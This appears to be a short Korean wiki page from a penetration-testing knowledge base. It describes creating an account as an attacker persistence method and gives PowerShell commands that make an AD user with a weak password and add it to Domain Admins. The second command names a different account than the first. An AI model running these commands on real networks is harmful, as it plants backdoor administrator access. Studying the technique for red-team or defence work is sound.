Create Account

지속성을 위한 방법론 중 가장 기초적이며 간단한 것은 계정 생성입니다.

공격자는 자신이 생성한 계정을 관리자 혹은 루트의 권한을 등록함으로써

언제든 시스템에 접속할 수 있습니다.

# 계정 생성
New-ADUser -Name "wiki2" -SamAccountName "wiki2" -AccountPassword (ConvertTo-SecureString "password123!" -AsPlainText -Force) -Enabled $true

# 도메인 관리자에 등록
Add-ADGroupMember -Identity "Domain Admins" -Members "wiki"

Last updated

Was this helpful?